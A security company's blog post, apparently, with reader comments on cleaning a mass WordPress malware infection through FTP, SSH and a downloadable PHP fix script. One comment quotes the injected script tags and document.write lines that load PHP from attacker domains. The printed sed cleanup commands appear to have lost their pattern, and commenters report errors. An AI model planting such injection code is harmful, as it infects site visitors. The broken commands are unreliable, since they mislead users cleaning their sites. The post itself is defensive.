If your site got hacked on the last mass infection of WordPress sites out there, we have a simple solution to clean it up.
For Network Solutions users:
If your site is at Network Solutions, and you have that “virtual-ad.org” malware, the solution is simple.
Login via FTP and remove the file cgi-bin/php.ini. That’s all you need to do to protect your users.
You will still have some “.nts” files in there (which you can remove later), but they will not be executed without the php.ini.
Via SSH:
If you have SSH access to your server, run the following commands on your web root:
$ find ./ -name "*.php" -type f | \ xargs sed -i 's###g' 2>&1$ find ./ -name "*.php" -type f | \ xargs sed -i '/./,$!d' 2>&1
Via web:
If you don’t have SSH access, download this file to your desktop:
http://sucuri.net/malware/helpers/wordpress-fix_php.txt and rename it to wordpress-fix.php.
After that, upload it to your site via FTP, and run it (using your browser) as: http://yoursite.com/wordpress-fix.php
This script will take a few minutes to complete, but will scan your whole site and remove the malware entries.
Once you are done, go back to your site and remove this file.
That’s it and you should be clean again.
UPDATE: If your site is not getting cleanup after you run it (or you are getting extra empty lines on the top of your files), it means that the script didn’t finish to run properly. Try running it again. It it doesn’t help, upload it to some sub directories (like wp-admin, wp-content and wp-includes) and run directly from there. For example:
http://yoursite.com/wp-admin/wordpress-fix.php , http://yoursite.com/wp-content/wordpress-fix.php , etc.
That should fix it!
As always, if you are having difficulties getting your site cleanup, send us an email at contact@sucuri.net or visit our site: http://sucuri.net. We can get your sites clean up right away.
Also, consider checking out our site security monitoring. We will monitor your sites 24×7 and alert you if it ever gets infected with malware, hacked or blacklisted.
Hello Guys,
I am also a victim.My suggestion is that if you are using any plugins like javascript and CSS optimizer then remove it. It's and RFI attack.Hope you all be happy with this.The attacker first distribute free program (open source) which working fine but he puts a security hole init for later use.He win the faith from us and then attack.
Thank you so much!
Pingback: Tweets that mention Simple cleanup solution for the latest Wordpress hack | Sucuri Security -- Topsy.com
Pingback: WordPress-based, GoDaddy-hosted websites hacked
If you are on Media Temple, i had 5 blogs, found wordpress templates infected. I suspect my laptop was the fist victim via malware, although not sure. Cleaned that up. Then used script from here. Cleaned it each time, but every day i would see somehow the hackers had reuploaded new exploit-laden akismet plugins onto the server. My latest discovery was that in the folder etc if you login in using ftp, they infected my php.ini file. You need to remove the last line on that file and then delete the sample.php.ini file which hosted malware. Now all clean again, but waiting for a few days to see if they come back (wish me luck!)
Thank you so much for the Quick Fix! So far everything looks good but will keep an eye on it.
Pingback: Attack on Wordpress – "http://www.indesignstudioinfo.com/ls.php" – Themes 'n' Templates Base
i run this script and i find that i get an error:
-bash: : command not found
running this:
$ find ./ -name "*.php" -type f | xargs sed -i 's###g' 2>&1
My recent post iOS4 iPhone 4 Release Day Apple Store
My WP was hacked on bluehost (3 sites). I ran the script but still see suspecious Java script in my footer when view the page source in the browser. You can see at internetincomeformula.com I have viewed the theme editor in the admin looking for this code in the footer. It is nowhere to be found. But when I view the page source code in my browser I can see this java script. How do I remove it?
i ran this on 5 WP sites, only to then find them all white-screened. i was able to find the malicious code on a couple of them, but it's not showing up on one in particular. if anyone has any suggestions, they would be much appreciated.
Pingback: Yet another series of attacks – This time using whereisdudescars.com | Sucuri
Seems like everyone has got it to work but i am having so much problem. I keep getting a 404 or
Warning: Unexpected character in input: ” (ASCII=92) state=1
Parse error: syntax error, unexpected T_STRING
Appreciate any help
good, but if you have installed nextgenGallery remove the plug-in code that is used instead.
make sure that your plug-ins do not use encode_64 before making this operation
All my PHP files were infected by:
All my HTML files were infected by:
<script src =http:// rubydistributions. com/imgs/cardgood .php >
All my “js” files were infected by:
document.write(‘<script src =http:// rustytolin. com/images/gifimg. php >’);
document.write(‘<script src = http:// rubydistributions. com /imgs/cardgood . php >’);
It was only the one attack and so many kind of files were infected.
Also malware create infected files "robots.php" and gifimg.php in "images" category of website
Please help me perform this step:
If you don’t have SSH access, download this file to your desktop: http://sucuri.net/malware/helpers/wordpress-fix_p... and rename it to wordpress-fix.php.
How do you download a 'text' file to your desktop? Thanks.
Please help me perform this step:
If you don’t have SSH access, download this file to your desktop: http://sucuri.net/malware/helpers/wordpress-fix_p.... and rename it to wordpress-fix.php.
How do you download a 'text' file to your desktop? Thanks.
I used it on my main domain and then some sub directories and got two different results. I'm assuming one means it ran and was ok, then the other means it found something and cleaned it up. Is that right? I'm pasting them below.
1. Site remediated by Sucuri
This script will clean the malware from this attack: http://sucuri.net/malware/entry/MW:MROBH:1
If you need help, contact support@sucuri.net or visit us at Sucuri.net
Site remediated by Sucuri
This script will clean the malware from this attack: http://sucuri.net/malware/entry/MW:MROBH:1
If you need help, contact support@sucuri.net or visit us at Sucuri.net
2. Site remediated by Sucuri
This script will clean the malware from this attack: http://sucuri.net/malware/entry/MW:MROBH:1
If you need help, contact support@sucuri.net or visit us at Sucuri.net
Malware removed.
Empty lines removed.
Completed.
My recent post Photos- Castle McCulloch
This worked for me but I had to run it several times and place it in my wp-admin directory on some of my blogs. Of 11 WP blogs, only the one at the root had to be run repeatedly. Also, I found a file, wtm.php that had nothing but the malicious code. I blew that one away manually.
Since this is the third time I’ve been infected, my question now is how do I protect my blogs? Is there any way to make wordpress secure? My wp is update, I’ve placed recommended in my htaccess file and placed that file in each of my wp-admin directories. Is there anything else I can do? I really don’t have time to do this every few days and I don’t have the money to hire someone else to do it for me.
Any ideas on how to secure WP?
When I run the command from ssh I get:
-bash: 1$: ambiguous redirect
-bash: : command not found